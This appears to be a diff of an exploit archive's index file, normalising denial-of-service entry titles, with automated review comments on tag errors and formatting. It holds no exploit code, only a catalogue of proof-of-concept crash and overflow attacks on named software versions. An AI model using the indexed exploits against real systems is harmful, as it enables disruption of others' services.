 8695,platforms/multiple/dos/8695.txt,"Eggdrop/Windrop 1.6.19 - ctcpbuf Remote Crash",2009-05-15,"Thomas Sader",multiple,dos,0
 8712,platforms/windows/dos/8712.txt,"httpdx 0.5b - Multiple Remote Denial of Service Vulnerabilities",2009-05-18,sico2819,windows,dos,0
 8720,platforms/multiple/dos/8720.c,"OpenSSL 0.9.8k / 1.0.0-beta2 - DTLS Remote Memory Exhaustion Denial of Service",2009-05-18,"Jon Oberheide",multiple,dos,0
@@ -1065,7 +1065,7 @@ id,file,description,date,author,platform,type,port
 8822,platforms/multiple/dos/8822.txt,"Mozilla Firefox 3.0.10 - (KEYGEN) Remote Denial of Service",2009-05-29,"Thierry Zoller",multiple,dos,0
 8826,platforms/multiple/dos/8826.txt,"Adobe Acrobat 9.1.1 (OSX/Windows) - Stack Overflow Crash (PoC)",2009-05-29,"Saint Patrick",multiple,dos,0
 8832,platforms/windows/dos/8832.php,"ICQ 6.5 - URL Search Hook (Windows Explorer) Remote Buffer Overflow (PoC)",2009-06-01,Nine:Situations:Group,windows,dos,0
-8837,platforms/windows/dos/8837.txt,"AIMP 2.51 build 330 - ID3v1/ID3v2 Tag Remote Stack Buffer Overflow PoC (SEH)",2009-06-01,LiquidWorm,windows,dos,0
+8837,platforms/windows/dos/8837.txt,"AIMP 2.51 build 330 - ID3v1/ID3v2 Tag Remote Stack Buffer Overflow (PoC) (SEH)",2009-06-01,LiquidWorm,windows,dos,0
 8842,platforms/multiple/dos/8842.pl,"Apache mod_dav / svn - Remote Denial of Service",2009-06-01,kingcope,multiple,dos,0
 8862,platforms/windows/dos/8862.txt,"Apple QuickTime - Image Description Atom Sign Extension (PoC)",2009-06-03,webDEViL,windows,dos,0
 8873,platforms/multiple/dos/8873.c,"OpenSSL < 0.9.8i - DTLS ChangeCipherSpec Remote Denial of Service",2009-06-04,"Jon Oberheide",multiple,dos,0
@@ -1087,11 +1087,11 @@ id,file,description,date,author,platform,type,port
 9067,platforms/hardware/dos/9067.py,"ARD-9808 DVR Card Security Camera - GET Request Remote Denial of Service",2009-07-01,Stack,hardware,dos,0
 9071,platforms/multiple/dos/9071.txt,"Apple Safari 4.x - JavaScript Reload Remote Crash",2009-07-02,SkyOut,multiple,dos,0
 9084,platforms/windows/dos/9084.txt,"Soulseek 157 NS < 13e/156.x - Remote Peer Search Code Execution (PoC)",2009-07-09,"laurent gaffié",windows,dos,0
-9085,platforms/multiple/dos/9085.txt,"MySQL 5.0.45 - Authenticated COM_CREATE_DB Format String PoC",2009-07-09,kingcope,multiple,dos,0
+9085,platforms/multiple/dos/9085.txt,"MySQL 5.0.45 - Authenticated COM_CREATE_DB Format String (PoC)",2009-07-09,kingcope,multiple,dos,0
 9090,platforms/windows/dos/9090.pl,"otsAV DJ 1.85.064 - '.ofl' Local Heap Overflow (PoC)",2009-07-09,hack4love,windows,dos,0
 9100,platforms/windows/dos/9100.html,"Microsoft Internet Explorer - (AddFavorite) Remote Crash (PoC)",2009-07-09,Sberry,windows,dos,0
 9102,platforms/windows/dos/9102.pl,"PatPlayer 3.9 - '.m3u' Local Heap Overflow (PoC)",2009-07-10,Cyber-Zone,windows,dos,0
-9113,platforms/windows/dos/9113.txt,"otsAV DJ/TV/Radio - Multiple Local Heap Overflow PoCs",2009-07-10,Stack,windows,dos,0
+9113,platforms/windows/dos/9113.txt,"otsAV DJ/TV/Radio - Multiple Local Heap Overflow (PoCs)",2009-07-10,Stack,windows,dos,0
 9114,platforms/windows/dos/9114.txt,"eEye Retina WiFi Security Scanner 1.0 - '.rws Parsing' Buffer Overflow (PoC)",2009-07-10,LiquidWorm,windows,dos,0
 9116,platforms/windows/dos/9116.html,"AwingSoft Web3D Player - 'WindsPly.ocx' Remote Buffer Overflow (PoC)",2009-07-10,shinnai,windows,dos,0
 9123,platforms/windows/dos/9123.pl,"M3U/M3L to ASX/WPL 1.1 - '.asx' / '.m3u' / '.m3l' Local Buffer Overflow (PoC)",2009-07-11,"ThE g0bL!N",windows,dos,0
@@ -1099,6 +1099,7 @@ id,file,description,date,author,platform,type,port
 9131,platforms/windows/dos/9131.py,"Tandberg MXP F7.0 - (USER) Remote Buffer Overflow (PoC)",2009-07-13,otokoyama,windows,dos,0
 9133,platforms/windows/dos/9133.pl,"ScITE Editor 1.72 - Local Crash",2009-07-13,prodigy,windows,dos,0
 9134,platforms/freebsd/dos/9134.c,"FreeBSD 6/8 - (ata device) Local Denial of Service",2009-07-13,"Shaun Colley",freebsd,dos,0
+9139,platforms/windows/dos/9139.pl,"JetAudio 7.5.3 COWON Media Center - '.wav' Crash",2009-07-14,prodigy,windows,dos,0
 9141,platforms/windows/dos/9141.pl,"Icarus 2.0 - '.ICP' Local Stack Overflow (PoC)",2009-07-14,"ThE g0bL!N",windows,dos,0
 9147,platforms/windows/dos/9147.pl,"MixVibes Pro 7.043 - '.vib' Local Stack Overflow (PoC)",2009-07-14,hack4love,windows,dos,0
 9157,platforms/windows/dos/9157.pl,"Hamster Audio Player 0.3a - Local Buffer Overflow (PoC)",2009-07-15,"ThE g0bL!N",windows,dos,0
@@ -1112,8 +1113,8 @@ id,file,description,date,author,platform,type,port
 9173,platforms/windows/dos/9173.pl,"MultiMedia Jukebox 4.0 Build 020124 - '.pst' / '.m3u' Heap Overflow (PoC)",2009-07-16,hack4love,windows,dos,0
 9175,platforms/multiple/dos/9175.txt,"Sguil/PADS - Remote Server Crash",2009-07-17,Ataraxia,multiple,dos,0
 9178,platforms/windows/dos/9178.pl,"MixSense 1.0.0.1 DJ Studio - '.mp3' Crash",2009-07-16,prodigy,windows,dos,0
-9189,platforms/windows/dos/9189.pl,"Streaming Audio Player 0.9 - (skin) Local Stack Overflow PoC (SEH)",2009-07-17,"ThE g0bL!N",windows,dos,0
-9192,platforms/windows/dos/9192.pl,"Soritong MP3 Player 1.0 - (SKIN) Local Stack Overflow PoC (SEH)",2009-07-17,"ThE g0bL!N",windows,dos,0
+9189,platforms/windows/dos/9189.pl,"Streaming Audio Player 0.9 - 'skin' Local Stack Overflow (PoC) (SEH)",2009-07-17,"ThE g0bL!N",windows,dos,0
+9192,platforms/windows/dos/9192.pl,"Soritong MP3 Player 1.0 - 'SKIN' Local Stack Overflow (PoC) (SEH)",2009-07-17,"ThE g0bL!N",windows,dos,0
 9198,platforms/multiple/dos/9198.txt,"Real Helix DNA - RTSP and SETUP Request Handler Vulnerabilities",2009-07-17,"Core Security",multiple,dos,0
 9200,platforms/windows/dos/9200.pl,"EpicVJ 1.2.8.0 - '.mpl' / '.m3u' Local Heap Overflow (PoC)",2009-07-20,hack4love,windows,dos,0
 9206,platforms/freebsd/dos/9206.c,"FreeBSD 7.2 - (pecoff executable) Local Denial of Service",2009-07-20,"Shaun Colley",freebsd,dos,0
@@ -1139,6 +1140,7 @@ id,file,description,date,author,platform,type,port
 9359,platforms/windows/dos/9359.pl,"jetAudio 7.1.9.4030 plus vx - '.m3u' Local Buffer Overflow (PoC)",2009-08-04,hack4love,windows,dos,0
 9361,platforms/windows/dos/9361.pl,"RadASM 2.2.1.6 Menu Editor - '.mnu' Stack Overflow (PoC)",2009-08-04,"Pankaj Kohli",windows,dos,0
 9362,platforms/windows/dos/9362.html,"Microsoft Internet Explorer 8.0.7100.0 - Simple HTML Remote Crash (PoC)",2009-08-05,schnuddelbuddel,windows,dos,0
+9364,platforms/windows/dos/9364.py,"Tuniac 090517c - '.m3u' Local File Crash (PoC)",2009-08-05,Dr_IDE,windows,dos,0
 9368,platforms/windows/dos/9368.pl,"UltraPlayer Media Player 2.112 - Local Buffer Overflow (PoC)",2009-08-05,SarBoT511,windows,dos,0
 9373,platforms/freebsd/dos/9373.c,"FreeBSD 7.2-RELEASE - SCTP Local Kernel Denial of Service",2009-08-06,"Shaun Colley",freebsd,dos,0
 9376,platforms/windows/dos/9376.py,"jetAudio 7.5.5 plus vx - (M3U/ASX/WAX/WVX) Local Crash (PoC)",2009-09-10,Dr_IDE,windows,dos,0
@@ -1153,7 +1155,7 @@ id,file,description,date,author,platform,type,port
 9427,platforms/windows/dos/9427.py,"VideoLAN VLC Media Player 1.0.0/1.0.1 - 'smb://' URI Handling Buffer Overflow (PoC)",2009-08-13,Dr_IDE,windows,dos,0
 9429,platforms/windows/dos/9429.py,"EmbedThis Appweb 3.0B.2-4 - Multiple Remote Buffer Overflow (PoC)",2009-08-13,Dr_IDE,windows,dos,0
 9442,platforms/linux/dos/9442.c,"Linux Kernel < 2.6.30.5 - 'cfg80211' Remote Denial of Service",2009-08-18,"Jon Oberheide",linux,dos,0
-9446,platforms/windows/dos/9446.cpp,"HTML Email Creator & Sender 2.3 - Local Buffer Overflow PoC (SEH)",2009-08-18,"fl0 fl0w",windows,dos,0
+9446,platforms/windows/dos/9446.cpp,"HTML Email Creator & Sender 2.3 - Local Buffer Overflow (PoC) (SEH)",2009-08-18,"fl0 fl0w",windows,dos,0
 9449,platforms/windows/dos/9449.txt,"TheGreenBow VPN Client - 'tgbvpn.sys' Local Denial of Service",2009-08-18,Evilcry,windows,dos,0
 9454,platforms/multiple/dos/9454.txt,"Apple Safari 4.0.2 - WebKit Parsing of Floating Point Numbers Buffer Overflow (PoC)",2009-08-18,"Leon Juranic",multiple,dos,0
 9455,platforms/windows/dos/9455.html,"Microsoft Internet Explorer - (JavaScript SetAttribute) Remote Crash",2009-08-18,"Irfan Asrar",windows,dos,0
@@ -1178,8 +1180,8 @@ id,file,description,date,author,platform,type,port
 9554,platforms/windows/dos/9554.html,"Apple iPhone 2.2.1/3.x - (MobileSafari) Crash + Reboot Exploit",2009-08-31,TheLeader,windows,dos,0
 9561,platforms/windows/dos/9561.py,"AIMP2 Audio Converter 2.53b330 - '.pls' / '.m3u' Unicode Crash (PoC)",2009-09-01,mr_me,windows,dos,0
 9573,platforms/windows/dos/9573.pl,"dTunes 2.72 - (Filename Processing) Local Format String (PoC)",2009-09-01,TheLeader,windows,dos,0
-9584,platforms/windows/dos/9584.txt,"PPstream 2.6.86.8900 - PPSMediaList ActiveX Remote Buffer Overflow PoC (1)",2009-09-03,"expose 0day",windows,dos,0
-9585,platforms/windows/dos/9585.txt,"PPstream 2.6.86.8900 - PPSMediaList ActiveX Remote Buffer Overflow PoC (2)",2009-09-03,"expose 0day",windows,dos,0
+9584,platforms/windows/dos/9584.txt,"PPstream 2.6.86.8900 - PPSMediaList ActiveX Remote Buffer Overflow (PoC) (1)",2009-09-03,"expose 0day",windows,dos,0
+9585,platforms/windows/dos/9585.txt,"PPstream 2.6.86.8900 - PPSMediaList ActiveX Remote Buffer Overflow (PoC) (2)",2009-09-03,"expose 0day",windows,dos,0
 9587,platforms/windows/dos/9587.txt,"Microsoft IIS 5.0/6.0 FTP Server - (Stack Exhaustion) Denial of Service",2009-09-04,kingcope,windows,dos,0
 9594,platforms/windows/dos/9594.txt,"Microsoft Windows Vista/7 - SMB2.0 Negotiate Protocol Request Remote Blue Screen of Death (MS07-063)",2009-09-09,"laurent gaffie",windows,dos,0
 9597,platforms/windows/dos/9597.txt,"Novell eDirectory 8.8 SP5 - Remote Denial of Service",2009-09-09,karak0rsan,windows,dos,0
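Review bot: The bulletin tag on the 9594 context line, `(MS07-063)`, looks wrong for a September 2009 SMB2 negotiate-request BSOD: if this is the SMB2 NEGOTIATE PROTOCOL REQUEST crash (CVE-2009-3103), the fixing bulletin is MS09-050, and an MS07-063 reference predates the disclosure by two years, so anyone using the index to check patch status would be pointed at the wrong update. Since this commit is already normalising the `(PoC)`/`(MSxx-xxx)` suffixes in this hunk, it is a good moment to verify that tag against the advisory and correct it to `(MS09-050)` if confirmed. This is a pre-existing value the commit does not touch, so I am flagging it rather than asserting it.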
@@ -1213,7 +1215,7 @@ id,file,description,date,author,platform,type,port
 9707,platforms/windows/dos/9707.pl,"Ease Audio Cutter 1.20 - '.wav' Local Crash (PoC)",2009-09-17,zAx,windows,dos,0
 9717,platforms/windows/dos/9717.txt,"Xerver HTTP Server 4.32 - Remote Denial of Service",2009-09-18,Dr_IDE,windows,dos,0
 9731,platforms/multiple/dos/9731.txt,"Snort unified 1 IDS Logging - Alert Evasion & Logfile Corruption/Alert Falsify",2009-09-21,"Pablo Rincón Crespo",multiple,dos,0
-9734,platforms/windows/dos/9734.py,"BigAnt Server 2.50 SP6 - '.zip' Local Buffer Overflow PoC (2)",2009-09-21,Dr_IDE,windows,dos,0
+9734,platforms/windows/dos/9734.py,"BigAnt Server 2.50 SP6 - '.zip' Local Buffer Overflow (PoC) (2)",2009-09-21,Dr_IDE,windows,dos,0
 9804,platforms/windows/dos/9804.rb,"XM Easy Personal FTP Server 5.8.0 - Denial of Service (Metasploit)",2009-11-10,zhangmc,windows,dos,21
 9806,platforms/windows/dos/9806.html,"HP LoadRunner 9.5 - Remote file creation (PoC)",2009-09-29,pyrokinesis,windows,dos,0
 9811,platforms/windows/dos/9811.py,"Core FTP Server 1.0 build 304 - Denial of Service",2009-09-28,Dr_IDE,windows,dos,21
@@ -1223,7 +1225,7 @@ id,file,description,date,author,platform,type,port
 9871,platforms/windows/dos/9871.txt,"Boloto Media Player 1.0.0.9 - pls file Denial of Service",2009-10-27,Dr_IDE,windows,dos,0
 9874,platforms/windows/dos/9874.txt,"Cherokee Web server 0.5.4 - Denial of Service",2009-10-26,"Usman Saeed",windows,dos,0
 9879,platforms/windows/dos/9879.txt,"EMC RepliStor Server 6.3.1.3 - Denial of Service",2009-10-20,bellick,windows,dos,7144
-9881,platforms/windows/dos/9881.txt,"Eureka Email Client 2.2q - PoC Buffer Overflow",2009-10-23,"Francis Provencher",windows,dos,110
+9881,platforms/windows/dos/9881.txt,"Eureka Email Client 2.2q - Buffer Overflow (PoC)",2009-10-23,"Francis Provencher",windows,dos,110
 9901,platforms/linux/dos/9901.txt,"Nginx 0.7.0 < 0.7.61 / 0.6.0 < 0.6.38 / 0.5.0 < 0.5.37 / 0.4.0 < 0.4.14 - Denial of Service (PoC)",2009-10-23,"Zeus Penguin",linux,dos,80
 9956,platforms/hardware/dos/9956.txt,"Palm Pre WebOS 1.1 - Denial of Service",2009-10-14,"Townsend Harris",hardware,dos,0
 9969,platforms/multiple/dos/9969.txt,"Snort 2.8.5 - IPv6 Denial of Service",2009-10-23,"laurent gaffie",multiple,dos,0
@@ -1232,7 +1234,7 @@ id,file,description,date,author,platform,type,port
 9987,platforms/multiple/dos/9987.txt,"ZoIPer 2.22 - Call-Info Remote Denial of Service",2009-10-14,"Tomer Bitton",multiple,dos,5060
 9999,platforms/windows/dos/9999.txt,"Cerberus FTP server 3.0.6 - Unauthenticated Denial of Service",2009-09-30,"Francis Provencher",windows,dos,21
 10004,platforms/multiple/dos/10004.txt,"Dopewars Server 1.5.12 - Denial of Service",2009-10-06,"Doug Prostko",multiple,dos,7902
-10005,platforms/windows/dos/10005.py,"Microsoft Windows 7 / Server 2008 R2 - Remote Kernel Crash",2009-11-11,"laurent gaffie",windows,dos,445
+10005,platforms/windows/dos/10005.py,"Microsoft Windows 7 / 2008 R2 - Remote Kernel Crash",2009-11-11,"laurent gaffie",windows,dos,445
 10017,platforms/linux/dos/10017.c,"Linux Kernel 2.6.x - 'fput()' Null Pointer Dereference Local Denial of Service",2009-11-09,"David Howells",linux,dos,0
 10022,platforms/linux/dos/10022.c,"Linux Kernel 2.6.31.4 - 'unix_stream_connect()' Local Denial of Service",2009-11-10,"Tomoki Sekiyama",linux,dos,0
 10062,platforms/windows/dos/10062.py,"Novell eDirectory 883ftf3 - nldap module Denial of Service",2009-11-16,ryujin,windows,dos,389
@@ -1294,7 +1296,7 @@ id,file,description,date,author,platform,type,port
 10593,platforms/windows/dos/10593.txt,"Winamp 5.57 - Stack Overflow",2009-12-22,scriptjunkie,windows,dos,0
 10603,platforms/windows/dos/10603.c,"Allied Telesyn TFTP (AT-TFTP) Server/Daemon 1.9 - Denial of Service",2009-12-22,Socket_0x03,windows,dos,0
 10617,platforms/linux/dos/10617.txt,"Printoxx - Local Buffer Overflow",2009-12-23,sandman,linux,dos,0
-10634,platforms/linux/dos/10634.txt,"Picpuz 2.1.1 - Buffer Overflow Denial of Service/PoC",2009-12-24,sandman,linux,dos,0
+10634,platforms/linux/dos/10634.txt,"Picpuz 2.1.1 - Buffer Overflow Denial of Service (PoC)",2009-12-24,sandman,linux,dos,0
 10650,platforms/windows/dos/10650.pl,"jetAudio 8.0.0.0 - '.asx' Basic Local Crash (PoC)",2009-12-25,"D3V!L FUCKER",windows,dos,0
 10651,platforms/windows/dos/10651.pl,"JetAudio Basic 7.5.5.25 - '.asx' Buffer Overflow (PoC)",2009-12-25,"D3V!L FUCKER",windows,dos,0
 10820,platforms/php/dos/10820.sh,"Joomla! Component Core 1.5.x com_ - Denial of Service",2009-12-31,emgent,php,dos,80
@@ -1318,7 +1320,7 @@ id,file,description,date,author,platform,type,port
 11020,platforms/windows/dos/11020.pl,"GOM Audio - Local Crash (PoC)",2010-01-06,applicationlayer,windows,dos,0
 11021,platforms/windows/dos/11021.txt,"FlashGet 3.x - IEHelper Remote Execution (PoC)",2010-01-06,superli,windows,dos,0
 11034,platforms/windows/dos/11034.txt,"Microsoft HTML Help Compiler (hhc.exe) - Buffer Overflow (PoC)",2010-01-06,s4squatch,windows,dos,0
-11043,platforms/hardware/dos/11043.txt,"Total MultiMedia Features - Denial of Service PoC for Sony Ericsson Phones",2010-01-06,Aodrulez,hardware,dos,0
+11043,platforms/hardware/dos/11043.txt,"Total MultiMedia Features - Sony Ericsson Phones Denial of Service (PoC)",2010-01-06,Aodrulez,hardware,dos,0
 11044,platforms/linux/dos/11044.txt,"Gnome Panel 2.28.0 - Denial of Service (PoC)",2010-01-06,"Pietro Oliva",linux,dos,0
 11052,platforms/windows/dos/11052.pl,"Kantaris 0.5.6 - Local Denial of Service (PoC)",2010-01-07,anonymous,windows,dos,0
 11053,platforms/windows/dos/11053.py,"ttplayer 5.6Beta3 - Denial of Service (PoC)",2010-01-07,"t-bag YDteam",windows,dos,0
@@ -1356,7 +1358,7 @@ id,file,description,date,author,platform,type,port
 11228,platforms/windows/dos/11228.pl,"Pico MP3 Player 1.0 - '.mp3' / '.pls' Local Crash (PoC)",2010-01-22,cr4wl3r,windows,dos,0
 11233,platforms/windows/dos/11233.pl,"QtWeb 3.0 - Remote Denial of Service/Crash",2010-01-22,"Zer0 Thunder",windows,dos,0
 11234,platforms/windows/dos/11234.py,"Sonique2 2.0 Beta Build 103 - Local Crash (PoC)",2010-01-23,b0telh0,windows,dos,0
-11245,platforms/windows/dos/11245.txt,"Mozilla Firefox 3.6 - (XML parser) Memory Corruption PoC/Denial of Service",2010-01-24,d3b4g,windows,dos,0
+11245,platforms/windows/dos/11245.txt,"Mozilla Firefox 3.6 - (XML parser) Memory Corruption (PoC) / Denial of Service",2010-01-24,d3b4g,windows,dos,0
 11247,platforms/windows/dos/11247.txt,"Opera 10.10 - (XML parser) Denial of Service (PoC)",2010-01-24,d3b4g,windows,dos,0
 11248,platforms/windows/dos/11248.pl,"Winamp 5.572 - 'whatsnew.txt' Stack Overflow (PoC)",2010-01-24,Debug,windows,dos,0
 11254,platforms/windows/dos/11254.pl,"P2GChinchilla HTTP Server 1.1.1 - Denial of Service",2010-01-24,"Zer0 Thunder",windows,dos,0
@@ -1402,13 +1404,13 @@ id,file,description,date,author,platform,type,port
 11537,platforms/windows/dos/11537.pl,"Chasys Media Player 1.1 - '.mid' Local Buffer Overflow",2010-02-22,cr4wl3r,windows,dos,0
 11540,platforms/windows/dos/11540.pl,"Total Video Player 1.31 - '.wav' Local Crash",2010-02-22,v3n0m,windows,dos,0
 11541,platforms/windows/dos/11541.pl,"Total Video Player 1.31 - '.avi' Local Crash (PoC)",2010-02-22,diving,windows,dos,0
-11546,platforms/hardware/dos/11546.py,"iPhone FTP Server (WiFi FTP) by SavySoda - Denial of Service/PoC",2010-02-23,b0telh0,hardware,dos,0
+11546,platforms/hardware/dos/11546.py,"iPhone FTP Server (WiFi FTP) by SavySoda - Denial of Service (PoC)",2010-02-23,b0telh0,hardware,dos,0
 11552,platforms/hardware/dos/11552.pl,"iPhone FtpDisc 1.0 - Denial of Service",2010-02-23,Ale46,hardware,dos,0
 11556,platforms/hardware/dos/11556.pl,"iPhone FTP Server By Zhang Boyang - Remote Denial of Service",2010-02-23,Ale46,hardware,dos,0
 11567,platforms/multiple/dos/11567.txt,"Apple Safari 4.0.4 / Google Chrome 4.0.249 - CSS style Stack Overflow Denial of Service (PoC)",2010-02-24,"Rad L. Sneak",multiple,dos,0
 11574,platforms/hardware/dos/11574.py,"iPhone - WebCore::CSSSelector() Remote Crash",2010-02-24,t12,hardware,dos,0
 11590,platforms/multiple/dos/11590.php,"Mozilla Firefox 3.6 - Denial of Service (2)",2010-02-27,Ale46,multiple,dos,0
-11597,platforms/hardware/dos/11597.py,"RCA DCM425 Cable Modem - micro_httpd Denial of Service/PoC",2010-02-28,ad0nis,hardware,dos,0
+11597,platforms/hardware/dos/11597.py,"RCA DCM425 Cable Modem - 'micro_httpd' Denial of Service (PoC)",2010-02-28,ad0nis,hardware,dos,0
 11601,platforms/windows/dos/11601.pl,"Apple Safari 4.0.4 (531.21.10) - Stack Overflow/Run Denial of Service",2010-02-28,"John Cobb",windows,dos,0
 11608,platforms/hardware/dos/11608.rb,"iPhone / iTouch FtpDisc 1.0 3 - ExploitsInOne Buffer Overflow Denial of Service",2010-03-01,"Alberto Ortega",hardware,dos,0
 11617,platforms/windows/dos/11617.txt,"Opera / Mozilla Firefox 3.6 - Long String Crash",2010-03-02,"Asheesh kumar Mani Tripathi",windows,dos,0
@@ -1454,7 +1456,7 @@ id,file,description,date,author,platform,type,port
 11955,platforms/windows/dos/11955.py,"All to All Audio Convertor 2.0 - Files Stack Overflow (PoC)",2010-03-30,ITSecTeam,windows,dos,0
 11959,platforms/windows/dos/11959.pl,"Xilisoft BlackBerry Ring Tone Maker - '.wma' Local Crash",2010-03-30,anonymous,windows,dos,0
 11966,platforms/windows/dos/11966.py,"Easy Icon Maker - '.ico' File Reading Crash",2010-03-30,ITSecTeam,windows,dos,0
-11975,platforms/windows/dos/11975.rb,"Free MP3 CD Ripper 2.6 - '.wav' PoC",2010-03-30,"Richard leahy",windows,dos,0
+11975,platforms/windows/dos/11975.rb,"Free MP3 CD Ripper 2.6 - '.wav' (PoC)",2010-03-30,"Richard leahy",windows,dos,0
 11977,platforms/windows/dos/11977.pl,"CDTrustee - '.BAK' Local Crash (PoC)",2010-03-31,anonymous,windows,dos,0
 11984,platforms/windows/dos/11984.py,"Optimal Archive 1.38 - '.zip' SEH (PoC)",2010-03-31,TecR0c,windows,dos,0
 11985,platforms/windows/dos/11985.sh,"BitComet 1.19 - Remote Denial of Service",2010-03-31,"Pierre Nogues",windows,dos,0
@@ -1476,7 +1478,7 @@ id,file,description,date,author,platform,type,port
 12093,platforms/hardware/dos/12093.txt,"McAfee Email Gateway (formerly IronMail) - Denial of Service",2010-04-06,"Nahuel Grisolia",hardware,dos,0
 12095,platforms/linux/dos/12095.txt,"Virata EmWeb R6.0.1 - Remote Crash",2010-04-06,"Jobert Abma",linux,dos,0
 12096,platforms/windows/dos/12096.txt,"Juke 4.0.2 - Denial of Service Multiple Files",2010-04-06,anonymous,windows,dos,0
-12104,platforms/windows/dos/12104.py,"Anyzip 1.1 - '.zip' PoC (SEH)",2010-04-07,ITSecTeam,windows,dos,0
+12104,platforms/windows/dos/12104.py,"Anyzip 1.1 - '.zip' (PoC) (SEH)",2010-04-07,ITSecTeam,windows,dos,0
 12109,platforms/multiple/dos/12109.txt,"Multiple Vendor 'librpc.dll' Signedness Error - Remote Code Execution",2010-04-08,ZSploit.com,multiple,dos,0
 12110,platforms/windows/dos/12110.pl,"CompleteFTP 3.3.0 - Remote Memory Consumption Denial of Service",2010-04-08,"Jonathan Salwan",windows,dos,0
 12131,platforms/windows/dos/12131.py,"Tembria Server Monitor 5.6.0 - Denial of Service",2010-04-09,Lincoln,windows,dos,0
@@ -1497,7 +1499,7 @@ id,file,description,date,author,platform,type,port
 15732,platforms/linux/dos/15732.txt,"FontForge - '.BDF' Font File Stack Based Buffer Overflow",2010-12-14,"Ulrik Persson",linux,dos,0
 12243,platforms/windows/dos/12243.py,"RPM Select/Elite 5.0 - '.xml config parsing' Unicode Buffer Overflow (PoC)",2010-04-14,mr_me,windows,dos,0
 12252,platforms/hardware/dos/12252.txt,"IBM Bladecenter Management Module - Denial of Service",2010-04-15,"Alexey Sintsov",hardware,dos,0
-12258,platforms/windows/dos/12258.py,"Microsoft Windows - SMB Client-Side Bug PoC (MS10-006)",2010-04-16,"laurent gaffie",windows,dos,0
+12258,platforms/windows/dos/12258.py,"Microsoft Windows - SMB Client-Side Bug (PoC) (MS10-006)",2010-04-16,"laurent gaffie",windows,dos,0
 12259,platforms/php/dos/12259.php,"PHP 5.3.x - Denial of Service",2010-04-16,ITSecTeam,php,dos,0
 12273,platforms/windows/dos/12273.py,"Microsoft Windows 7/2008 R2 - SMB Client Trans2 Stack Overflow (MS10-020) (PoC)",2010-04-17,"laurent gaffie",windows,dos,0
 12274,platforms/windows/dos/12274.py,"Multiple Vendor AgentX++ - Stack Buffer Overflow",2010-04-17,ZSploit.com,windows,dos,0
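Review bot: The new 12258 line orders its suffixes as `(PoC) (MS10-006)`, while the 12273 context line two rows below keeps the opposite order, `(MS10-020) (PoC)`, so this normalisation pass leaves two adjacent SMB-client entries by the same author tagged inconsistently. Whichever order the project settles on, the bulletin tag is the one defenders grep for, so it is worth applying the same order to both rows in this commit rather than leaving a half-converted pair; for example `"Microsoft Windows 7/2008 R2 - SMB Client Trans2 Stack Overflow (PoC) (MS10-020)"` if the PoC-first form used elsewhere in this diff is the intended convention.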
@@ -1558,12 +1560,12 @@ id,file,description,date,author,platform,type,port
 12687,platforms/windows/dos/12687.pl,"WinDirectAudio 1.0 - '.wav' (PoC)",2010-05-21,ahwak2000,windows,dos,0
 12698,platforms/windows/dos/12698.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - 'PORT' Command Remote Denial of Service",2010-05-22,Ma3sTr0-Dz,windows,dos,0
 12704,platforms/windows/dos/12704.txt,"Media Player Classic 1.3.1774.0 - '.rm' Buffer Overflow (PoC)",2010-05-23,"sniper ip",windows,dos,0
-12740,platforms/windows/dos/12740.py,"Webby WebServer - PoC SEH control",2010-05-25,m-1-k-3,windows,dos,0
+12740,platforms/windows/dos/12740.py,"Webby WebServer - SEH Control (PoC)",2010-05-25,m-1-k-3,windows,dos,0
 12741,platforms/windows/dos/12741.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Universal Unauthenticated Denial of Service",2010-05-25,Dr_IDE,windows,dos,0
 12751,platforms/windows/dos/12751.pl,"Adobe Photoshop CS4 Extended 11.0 - '.ABR' File Handling Remote Buffer Overflow (PoC)",2010-05-26,LiquidWorm,windows,dos,0
 12752,platforms/windows/dos/12752.c,"Adobe Photoshop CS4 Extended 11.0 - '.GRD' File Handling Remote Buffer Overflow (PoC)",2010-05-26,LiquidWorm,windows,dos,0
 12753,platforms/windows/dos/12753.c,"Adobe Photoshop CS4 Extended 11.0 - '.ASL' File Handling Remote Buffer Overflow (PoC)",2010-05-26,LiquidWorm,windows,dos,0
-12762,platforms/freebsd/dos/12762.txt,"FreeBSD 8.0 ftpd - off-by one PoC (FreeBSD-SA-10:05)",2010-05-27,"Maksymilian Arciemowicz",freebsd,dos,0
+12762,platforms/freebsd/dos/12762.txt,"FreeBSD 8.0 ftpd (FreeBSD-SA-10:05) - Off- By One (PoC)",2010-05-27,"Maksymilian Arciemowicz",freebsd,dos,0
 12774,platforms/windows/dos/12774.py,"Home FTP Server 1.10.3 (build 144) - Denial of Service",2010-05-28,Dr_IDE,windows,dos,0
 12775,platforms/multiple/dos/12775.py,"VideoLAN VLC Media Player 1.0.6 - '.avi' Media File Crash (PoC)",2010-05-28,Dr_IDE,multiple,dos,0
 12816,platforms/windows/dos/12816.py,"ZipExplorer 7.0 - '.zar' Denial of Service",2010-05-31,TecR0c,windows,dos,0
@@ -1614,7 +1616,7 @@ id,file,description,date,author,platform,type,port
 14099,platforms/windows/dos/14099.py,"MemDb - Multiple Remote Denial of Service",2010-06-28,Markot,windows,dos,80
 14102,platforms/windows/dos/14102.py,"Winamp 5.571 - '.avi' Denial of Service",2010-06-28,"Praveen Darshanam",windows,dos,0
 14121,platforms/multiple/dos/14121.c,"Adobe Reader 9.3.2 - 'CoolType.dll' Remote Memory Corruption / Denial of Service",2010-06-29,LiquidWorm,multiple,dos,0
-14156,platforms/windows/dos/14156.txt,"Microsoft Windows Vista/Server 2008 - NtUserCheckAccessForIntegrityLevel Use-After-Free",2010-07-01,MSRC,windows,dos,0
+14156,platforms/windows/dos/14156.txt,"Microsoft Windows Vista/2008 - NtUserCheckAccessForIntegrityLevel Use-After-Free",2010-07-01,MSRC,windows,dos,0
 14175,platforms/windows/dos/14175.pl,"Mp3 Digitalbox 2.7.2.0 - '.mp3' Local Stack Overflow (PoC)",2010-07-02,v3n0m,windows,dos,0
 14185,platforms/multiple/dos/14185.py,"ISC DHCPD - Denial of Service",2010-07-03,sid,multiple,dos,0
 14236,platforms/windows/dos/14236.txt,"Sun Java Web Server 7.0 u7 - Admin Interface Denial of Service",2010-07-06,muts,windows,dos,8800
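Review bot: The rewritten 12762 description introduces a stray space in the vulnerability class, `Off- By One`, which breaks the hyphenated term the old line spelled as `off-by one` and makes the row miss any search for "Off-By-One". The fix is the single description field: `"FreeBSD 8.0 ftpd (FreeBSD-SA-10:05) - Off-By-One (PoC)"`. Moving the `(FreeBSD-SA-10:05)` advisory tag ahead of the dash also departs from the trailing-tag placement the rest of this diff uses for `(MSxx-xxx)`, so consider keeping it at the end for consistency.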
